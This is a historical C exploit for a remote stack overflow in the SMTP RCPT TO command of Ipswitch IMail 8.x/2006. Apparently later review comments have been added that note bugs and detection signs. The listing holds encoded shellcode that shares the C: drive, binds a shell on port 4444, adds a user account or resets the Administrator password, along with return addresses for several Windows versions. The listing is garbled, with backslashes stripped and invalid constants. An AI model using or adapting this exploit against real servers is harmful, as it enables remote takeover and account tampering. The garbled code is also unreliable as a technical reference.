
# Title : Ipswitch IMail Server 2006 / 8.x (RCPT) Remote Stack Overflow Exploit
# Published : 2006-10-19
# Author : Greg Linares


// IMail 2006 and 8.x SMTP Stack Overflow Exploit
// coded by Greg Linares [glinares.code[at]gmail[dot]com]
// http://www.juniper.net/security/auto/vulnerabilities/vuln3414.html
// This works on the following versions:
// 2006 IMail prior to 2006.1 update


#include <stdio.h>
#include <string.h>
#include <windows.h>
#include <winsock.h>

#pragma comment(lib,"wsock32.lib")

int main(int argc, char *argv[])
{
/*
 * Entry point.  Builds one over-long SMTP "RCPT TO:" command for the host
 * named in argv[1], sends it, and then reconnects to guess from the
 * presence of a "220" banner whether the remote SMTP service survived.
 *
 * Arguments: argv[1] host, argv[2] port (default "25"), argv[3] payload
 * selector 1-4, argv[4] JMP selector 1-8.  Only argc <= 1 is rejected
 * below; argv[4] is read regardless of argc and atoi(argv[3]) is called
 * unconditionally later, so fewer than four arguments means a NULL
 * dereference or a read past the end of argv.
 *
 * exit() and atoi() live in <stdlib.h>, which is not included here; it
 * presumably arrives indirectly through <windows.h>.
 *
 * NOTE(review): the listing as printed does not compile (e.g. the empty
 * character constants '' used as terminators further down).  It is kept
 * as a historical record of the attack on the versions named in the file
 * header, where IMail releases before the 2006.1 update are the affected
 * ones.
 */
static char overflow[1028];	// The command line sent to the server; only ever grown with unchecked strcat().



// PAYLOADS
// Restricted Chars = 0x00 0x0D 0x0A 0x20 0x3e 0x22 (Maybe More)
// Per the metasploit.com generator comments, each array below is an
// encoded stage whose effect on the server host is: share C: as "Export",
// bind a shell on TCP 4444, add user "Error"/"Error", or reset the
// Administrator password.  Those are the host-side artifacts to check for
// when responding to a crash of this SMTP service.

/* win32_exec -  EXITFUNC=seh CMD=net share Export=C: /unlimited Size=188 Encoder=ShikataGaNai http://metasploit.com */
unsigned char RootShare[] =
"xdbxcbx29xc9xbaxfaxefx47x2bxb1x2axd9x74x24xf4x58"
"x31x50x17x83xc0x04x03xaaxfcxa5xdexb6xebx6ex21x46"
"xecxe5x64x7ax67x85x63xfax76x99xe7xb5x60xeexa7x69"
"x90x1bx1exe2xa6x50xa0x1axf7xa6x3ax4ex7cxe6x49x89"
"xbcx2dxbcx94xfcx59x4bxadx54xbaxb0xa4xb1x49xe7x62"
"x3bxa5x7exe1x37x72xf4xaax5bx85xe1xdfx78x0exf4x34"
"x09x4cxd3xcexc9x5cxdbxaax46xdexebxb7x99xa7x07x3c"
"x59x54x93x32x46xc9x28xdax7exfax26x91xffx4cx38xa5"
"xffx27x51x99xa0x06x54x81x08xe0x60xc2x75x89xc0xac"
"x85xe4xe5x73x0ex61x1bx01xc0xc6x1bxf2xb3x8dx97xdc"
"x38x26x39x6exdax96xfcxf6x54xb8x8cx72xa8x05x4bx26"
"xf2xa6xdexb8x9exd1x4dx2dx2bx47xeaxad";


/* win32_bind -  EXITFUNC=seh LPORT=4444 Size=344 Encoder=Pex http://metasploit.com */
unsigned char Win32Bind[] =
"x33xc9x83xe9xb0xe8xffxffxffxffxc0x5ex81x76x0ex93"
"x7bxbdx36x83xeexfcxe2xf4x6fx11x56x7bx7bx82x42xc9"
"x6cx1bx36x5axb7x5fx36x73xafxf0xc1x33xebx7ax52xbd"
"xdcx63x36x69xb3x7ax56x7fx18x4fx36x37x7dx4ax7dxaf"
"x3fxffx7dx42x94xbax77x3bx92xb9x56xc2xa8x2fx99x1e"
"xe6x9ex36x69xb7x7ax56x50x18x77xf6xbdxccx67xbcxdd"
"x90x57x36xbfxffx5fxa1x57x50x4ax66x52x18x38x8dxbd"
"xd3x77x36x46x8fxd6x36x76x9bx25xd5xb8xddx75x51x66"
"x6cxadxdbx65xf5x13x8ex04xfbx0cxcex04xccx2fx42xe6"
"xfbxb0x50xcaxa8x2bx42xe0xccxf2x58x50x12x96xb5x34"
"xc6x11xbfxc9x43x13x64x3fx66xd6xeaxc9x45x28xeex65"
"xc0x28xfex65xd0x28x42xe6xf5x13xacx6axf5x28x34xd7"
"x06x13x19x2cxe3xbcxeaxc9x45x11xadx67xc6x84x6dx5e"
"x37xd6x93xdfxc4x84x6bx65xc6x84x6dx5ex76x32x3bx7f"
"xc4x84x6bx66xc7x2fxe8xc9x43xe8xd5xd1xeaxbdxc4x61"
"x6cxadxe8xc9x43x1dxd7x52xf5x13xdex5bx1ax9exd7x66"
"xcax52x71xbfx74x11xf9xbfx71x4ax7dxc5x39x85xffx1b"
"x6dx39x91xa5x1ex01x85x9dx38xd0xd5x44x6dxc8xabxc9"
"xe6x3fx42xe0xc8x2cxefx67xc2x2axd7x37xc2x2axe8x67"
"x6cxabxd5x9bx4ax7ex73x65x6cxadxd7xc9x6cx4cx42xe6"
"x18x2cx41xb5x57x1fx42xe0xc1x84x6dx5ex63xf1xb9x69"
"xc0x84x6bxc9x43x7bxbdx36";

/* win32_adduser -  PASS=Error EXITFUNC=seh USER=Error Size=236 Encoder=PexFnstenvSub http://metasploit.com */
unsigned char AddUser[] =
"x2bxc9x83xe9xcbxd9xeexd9x74x24xf4x5bx81x73x13xb2"
"xe6xafx6ax83xebxfcxe2xf4x4ex0exebx6axb2xe6x24x2f"
"x8ex6dxd3x6fxcaxe7x40xe1xfdxfex24x35x92xe7x44x23"
"x39xd2x24x6bx5cxd7x6fxf3x1ex62x6fx1exb5x27x65x67"
"xb3x24x44x9ex89xb2x8bx6exc7x03x24x35x96xe7x44x0c"
"x39xeaxe4xe1xedxfaxaex81x39xfax24x6bx59x6fxf3x4e"
"xb6x25x9exaaxd6x6dxefx5ax37x26xd7x66x39xa6xa3xe1"
"xc2xfax02xe1xdaxeex44x63x39x66x1fx6axb2xe6x24x02"
"x8exb9x9ex9cxd2xb0x26x92x31x26xd4x3axdax16x25x6e"
"xedx8ex37x94x38xe8xf8x95x55x85xc2x0ex9cx83xd7x0f"
"x92xc9xccx4axdcx83xdbx4axc7x95xcax18x92xa3xddx18"
"xddx94x8fx2fxc0x94xc0x18x92xc9xeex2exf6xc6x89x4c"
"x92x88xcax1ex92x8axc0x09xd3x8axc8x18xddx93xdfx4a"
"xf3x82xc2x03xdcx8fxdcx1exc0x87xdbx05xc0x95x8fx2f"
"xc0x94xc0x18x92xc9xeex2exf6xe6xafx6a";

/* win32_exec -  CMD=net user Administrator "p@ssw0rd" Size=187 Encoder=Pex http://metasploit.com */
unsigned char ChangeAdmin[] =
"x29xc9x83xe9xdaxe8xffxffxffxffxc0x5ex81x76x0ex74"
"xb8x4fxbax83xeexfcxe2xf4x88x50x0bxbax74xb8xc4xff"
"x48x33x33xbfx0cxb9xa0x31x3bxa0xc4xe5x54xb9xa4xf3"
"xffx8cxc4xbbx9ax89x8fx23xd8x3cx8fxcex73x79x85xb7"
"x75x7axa4x4ex4fxecx6bxbex01x5dxc4xe5x50xb9xa4xdc"
"xffxb4x04x31x2bxa4x4ex51xffxa4xc4xbbx9fx31x13x9e"
"x70x7bx7ex7ax10x33x0fx8axf1x78x37xb6xffxf8x43x31"
"x04xa4xe2x31x1cxb0xa4xb3xffx38xffxbax74xb8xc4xd2"
"x48xe7x7ex4cx14xeexc6x42xf7x78x34xeax1cx48xc5xbe"
"x2bxd0xd7x44xfexb6x18x45x93xd6x2axcex54xcdx3cxdf"
"x06x98x0bxc8x15xd3x2ax9ax5bxd9x2bxdex74xb8x4fxba";


   WSADATA wsaData;

   struct hostent *hp;
   struct sockaddr_in sockin;
   char buf[300], *check;		// Banner buffer.  recv() below may return 300, and then buf[bytes] is written one past the end.
   int sockfd, bytes;			// sockfd narrows a SOCKET to int; see the socket() checks below.
   int plen, i, JMP;
   char *hostname;
   unsigned short port;

   printf("IMail 2006 and 8.x SMTP 'RCPT TO:' Stack Overflow Exploitn");
   printf("Coded by Greg Linares < glinares.code  [at] GMAIL [dot] com >n");
   if (argc <= 1)
   {
		printf("Usage: %s [hostname] [port] <Payload> <JMP>n", argv[0]);
      	printf("Default port is 25 rn");
		printf("==============================n");
	  	printf("Payload Options: 1 = Defaultn");
		printf("==============================n");
	  	printf("1 = Share C:\ as 'Export' Sharen");
	  	printf("2 = Add User 'Error' with Password 'Error'n");
	  	printf("3 = Win32 Bind CMD to Port 4444n");
		printf("4 = Change Administrator Password to 'p@ssw0rd'n");
		printf("==============================n");
	  	printf("JMP Options: 1 = Defaultn");
		printf("==============================n");
	  	printf("1 = IMAIL 8.x SMTPDLL.DLL	   [pop ebp, ret] 0x10036f71 n");
		printf("2 = Win2003 SP1 English NTDLL.DLL [pop ebp, ret] 0x7c87d8af n");
		// The 0x77d02289 shown for option 3 does not match the Win2k3SP0E constant (0x77d5c14c) used further down.
		printf("3 = Win2003 SP0 English USER32.DLL [pop ebp, ret] 0x77d02289 n");
		printf("4 = WinXP SP2 English NTDLL.DLL [pop ebp, ret] 0x7c967e23 n");
		printf("5 = WinXP SP1 - SP0 English USER32.DLL [pop ebp, ret] 0x71ab389c n");
		printf("6 = Win2000 Universal English USER32.DLL [pop ebp, ret] 0x75021397 n");
		printf("7 = Win2000 Universal French USER32.DLL [pop ebp, ret] 0x74fa1397 n");
		printf("8 = Windows XP SP1 - SP2 German USER32.DLL [pop ebp, ret] 0x77d18c14 rn");

      exit(0);
   	}

   	hostname = argv[1];
   	if (argv[2]) port = atoi(argv[2]);
   		else port = atoi("25");
   	// argv[4] is read here even when argc < 5, i.e. past the NULL that ends argv.
   	if (argv[4]) JMP = atoi(argv[4]);
		else JMP = atoi("1");

   	// WSAStartup() signals failure with a non-zero (positive) error code, so this "< 0" test never fires.
   	if (WSAStartup(MAKEWORD(1, 1), &wsaData) < 0)
   	{
    	fprintf(stderr, "Error setting up with WinSock v1.1n");
      	exit(-1);
   	}


   	hp = gethostbyname(hostname);
   	if (hp == NULL)
   	{
      	printf("ERROR: Uknown host %sn", hostname);
	  	printf("%s",hostname);
      	exit(-1);
   	}

   	sockin.sin_family = hp->h_addrtype;
   	sockin.sin_port = htons(port);
   	sockin.sin_addr = *((struct in_addr *)hp->h_addr);

   	// socket() reports failure as INVALID_SOCKET, not SOCKET_ERROR; this comparison
   	// appears to work only because both values narrow to -1 in an int.
   	if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == SOCKET_ERROR)
   	{
      	printf("ERROR: Socket Errorn");
      	exit(-1);
   	}

   	if ((connect(sockfd, (struct sockaddr *) &sockin,
                sizeof(sockin))) == SOCKET_ERROR)
   	{
      	printf("ERROR: Connect Errorn");
      	closesocket(sockfd);
      	WSACleanup();
      	exit(-1);
   	}

   	printf("Connected to [%s] on port [%d], sending overflow....n",
          hostname, port);


   	// recv() may return 0 (peer closed) or the full 300 bytes; the latter makes
   	// the buf[bytes] store below an out-of-bounds write.
   	if ((bytes = recv(sockfd, buf, 300, 0)) == SOCKET_ERROR)
   	{
      	printf("ERROR: Recv Errorn");
      	closesocket(sockfd);
      	WSACleanup();
      	exit(1);
   	}

   	/* wait for SMTP service welcome*/
   	buf[bytes] = '';
   	check = strstr(buf, "220");
   	if (check == NULL)
   	{
      	printf("ERROR: NO  response from SMTP servicen");
      	closesocket(sockfd);
      	WSACleanup();
      	exit(-1);
   	}


   // JMP to EAX = Results in a Corrupted Stack
   // so instead we POP EBP, RET to restore pointer and then return
   // this causes code procedure to continue
   /*
   		['IMail 8.x Universal', 0x10036f71 ],
		['Windows 2003 SP1 English', 0x7c87d8af ],
		['Windows 2003 SP0 English', 0x77d5c14c ],
		['Windows XP SP2 English', 0x7c967e23 ],
		['Windows XP SP1 English', 0x71ab389c ],
		['Windows XP SP0 English', 0x71ab389c ],
		['Windows 2000 Universal English', 0x75021397 ],
		['Windows 2000 Universal French', 0x74fa1397],
		['Windows XP SP1 - SP2 German', 0x77d18c14],
	*/
   	// Shape of the malicious line on the wire: "RCPT TO: <@" + 4-byte return address
   	// + ":" + filler + StackS + payload + "SSS>" + newline, several hundred bytes in
   	// all.  For detection, an RCPT argument that long and containing non-printable
   	// bytes is the signal; the tool's own success test near the end is merely "the
   	// service stopped answering".
   	char Exp[] = "RCPT TO: <@";						// This stores our JMP between the @ and :
   	char Win2k3SP1E[] = "xafxd8x87x7c:";		//Win2k3 SP1 English NTDLL.DLL [pop ebp, ret] 0x7c87d8af
  	char WinXPSP2E[] = "x23x7ex96x7c:";			//WinXP SP2 English  NTDLL.DLL [pop ebp, ret] 0x7c967e23
   	char IMail815[] = "x71x6fx03x10:"; 			//IMAIL 8.15 SMTPDLL.DLL	   [pop ebp, ret] 0x10036f71
	char Win2k3SP0E[] = "x4cxc1xd5x77:";		//Win2k3 SP0 English USER32.DLL [pop ebp, ret]0x77d5c14c
	char WinXPSP2[] = "x23x7ex96x7c:";			//WinXP SP2 English USER32.DLL [pop ebp, ret] 0x7c967e23
	char WinXPSP1[] = "x9cx38xabx71:";			//WinXP SP1 and 0 English U32	[pop ebp, ret]0x71ab389c
	char Win2KE[] = "x97x31x02x75:";			//Win2k English All SPs			[pop ebp, ret]0x75021397
	char Win2KF[] = "x97x13xfax74:";			// As above except French Win2k	[pop ebp, ret]0x74fa1397
	char WinXPG[] = "x14x8cxd1x77:";			//WinXP SP1 - SP2 German U32    [pop ebp, ret]0x77d18c14

	char tail[] = "SSS>n";							// This closes the RCPT cmd.  Any characters work.
	// Another overflow can be achieved by using an overly long buffer after RCPT TO: on 8.15 systems
	// After around 560 bytes or so EIP gets overwritten.  But this method is easier to exploit and it works
	// On all versions from 8.x to 2006 (9.x?)
	char StackS[] = "x81xc4xffxefxffxffx44";	// Stabolize Stack prior to payload.
   	// Assemble the line.  Nothing bounds the strcat() calls against sizeof overflow;
   	// the total just happens to fit in 1028 bytes.
   	memset(overflow, 0, 1028);
   	strcat(overflow, Exp);
	// Return-address selection; any value outside 1-8 silently falls back to option 1.
	if (JMP == 1)
	{
		printf("Using IMail 8.15 SMTDP.DLL JMPn");
		strcat(overflow, IMail815);
	} else if (JMP == 2)
	{
		printf("Using Win2003 SP1 NTDLL.DLL JMPn");
		strcat(overflow, Win2k3SP1E);
	} else if (JMP == 3)
	{
		printf("Using Win2003 SP0 USER32.DLL JMPn");
		strcat(overflow, Win2k3SP0E);
	} else if (JMP == 4)
	{
		printf("Using WinXP SP2 NTDLL.DLL JMPn");
		strcat(overflow, WinXPSP2E);
	} else if (JMP == 5)
	{
		printf("Using WinXP SP1 and SP0 USER32.DLL JMPn");
		strcat(overflow, WinXPSP1);
	} else if (JMP == 6)
	{
		printf("Using Win2000 Universal English USER32.DLL JMPn");
		strcat(overflow, Win2KE);
	} else if (JMP == 7)
	{
		printf("Using Win2000 Universal French USER32.DLL JMPn");
		strcat(overflow, Win2KF);
	} else if (JMP == 8)
	{
		printf("Using WinXP SP2 and SP1 German USER32.DLL JMPn");
		strcat(overflow, WinXPG);
	} else {
		printf("Using IMail 8.15 SMTDP.DLL JMPn");
		strcat(overflow, IMail815);
	}
		


    // Setup Payload Options
	// Unknown selector values fall back to the bind-shell payload (option 3).
	// plen is 544 minus the payload and StackS lengths, so a payload longer than
	// 544 bytes gives a negative plen and no filler at all.  atoi(argv[3]) here is
	// the first use of argv[3], unguarded by the argc check above.  Passing the
	// unsigned char arrays to strlen() is an incompatible-pointer-type diagnostic.
	if (atoi(argv[3]) == 1)
	{
		printf("Using Root Share Payloadn");
		plen = 544 - ((strlen(RootShare) + strlen(StackS)));
		for (i=0; i<plen; i++){
			strcat(overflow, "x90");
		}
		strcat(overflow, StackS);
		strcat(overflow, RootShare);

	} else if (atoi(argv[3]) == 2)
	{
		printf("Using Add User Payloadn");
		plen = 544 - ((strlen(AddUser)+ strlen(StackS)));
		for (i=0; i<plen; i++){
			strcat(overflow, "x90");
		}
		strcat(overflow, StackS);
		strcat(overflow, AddUser);
	} else if (atoi(argv[3]) == 3)
	{
		printf("Using Win32 CMD Bind Payloadn");
		plen = 544 - ((strlen(Win32Bind) + strlen(StackS)));
		for (i=0; i<plen; i++){
			strcat(overflow, "x90");
		}
		strcat(overflow, StackS);
		strcat(overflow, Win32Bind);
	} else if (atoi(argv[3]) == 4)
	{
		printf("Using Change Admin Password Payload (Pwd = 'p@ssw0rd')n");
		plen = 544 - ((strlen(ChangeAdmin) + strlen(StackS)));
		for (i=0; i<plen; i++){
			strcat(overflow, "x90");
		}
		strcat(overflow, StackS);
		strcat(overflow, ChangeAdmin);
	} else
	{
		printf("Using Win32 CMD Bind Payloadn");
		plen = 544 - ((strlen(Win32Bind) + strlen(StackS)));
		for (i=0; i<plen; i++){
			strcat(overflow, "x90");
		}
		strcat(overflow, StackS);
		strcat(overflow, Win32Bind);
	}

	// Dont forget to add the trailing characters to set up stack overflow
	strcat(overflow, tail);



	// Connect to SMTP Server and Setup Up Email
	// EHLO and MAIL FROM go out with fixed 1 s pauses; their send() results are ignored.
   	char EHLO[] = "EHLO rn";
   	char MF[] = "MAIL FROM <TEST@TEST> rn";
   	send(sockfd, EHLO, strlen(EHLO), 0);
   	Sleep(1000);
   	send(sockfd, MF, strlen(MF), 0);
   	Sleep(1000);


   	if (send(sockfd, overflow, strlen(overflow),0) == SOCKET_ERROR)
   	{
		printf("ERROR: Send Errorn");
      	closesocket(sockfd);
      	WSACleanup();
      	exit(-1);
  	}

  	printf("Exploit Sent.....rn");
	// For the bind-shell payload the tool stops here and skips the liveness probe.
	if (atoi(argv[3]) == 3)
	{
		printf("Check Shell on Port 4444n");
		closesocket(sockfd);
      	WSACleanup();
      	exit(0);
	}

	// Liveness probe: reconnect and expect a fresh 220 banner.  Every failure mode
	// below (connect, recv, or no banner) is reported as success, i.e. the heuristic
	// is "the SMTP service crashed", which is why the message tells the operator to
	// restart it.  The same buf[bytes] boundary issue as above recurs here.
	printf("Checking If Exploit Executed....rn");
	Sleep(1000);
	closesocket(sockfd);

	sockin.sin_family = hp->h_addrtype;
   	sockin.sin_port = htons(port);
   	sockin.sin_addr = *((struct in_addr *)hp->h_addr);

   	if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == SOCKET_ERROR)
   	{
      	printf("ERROR: Socket Errorn");
      	exit(-1);
   	}

   	if ((connect(sockfd, (struct sockaddr *) &sockin,
                sizeof(sockin))) == SOCKET_ERROR)
   	{
      	printf("Exploit Successfully Delivered!n");
		closesocket(sockfd);
		WSACleanup();
		printf("Don't Forget to Restart the IMAIL SMTP Service to Re-exploit!");
		exit(0);
   	}
	printf("...");
	if ((bytes = recv(sockfd, buf, 300, 0)) == SOCKET_ERROR)
   	{
      	printf("Exploit Successfully Delivered!n");
		closesocket(sockfd);
		WSACleanup();
		printf("Don't Forget to Restart the IMAIL SMTP Service to Re-exploit!");
		exit(0);
   	}

   	/* wait for SMTP service welcome*/
   	buf[bytes] = '';
   	check = strstr(buf, "220");
   	if (check == NULL)
   	{
      	printf("Exploit Successfully Delivered!n");
		closesocket(sockfd);
		WSACleanup();
		printf("Don't Forget to Restart the IMAIL SMTP Service to Re-exploit!");
		exit(0);
   	}

	// Reached only when the service answered normally again.
	printf("Exploit Failed: Try A different JMP Method or Payloadn");
	closesocket(sockfd);
  	WSACleanup();
  	exit (1);
}
